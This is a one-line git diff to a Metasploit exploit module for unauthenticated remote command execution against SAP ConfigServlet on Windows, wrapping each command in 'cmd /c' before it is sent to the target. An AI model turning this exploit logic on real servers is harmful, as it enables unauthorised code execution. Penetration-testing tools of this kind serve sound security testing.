diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb index 313265c049..7925d2e0a5 100644 --- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb +++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb @@ -61,6 +61,7 @@ class Metasploit3 < Msf::Exploit end def execute_command(cmd, opts) + cmd = "cmd /c " + cmd vprint_status("Attempting to execute: #{cmd}") send_evil_request(opts[:sap_configservlet_uri], cmd) end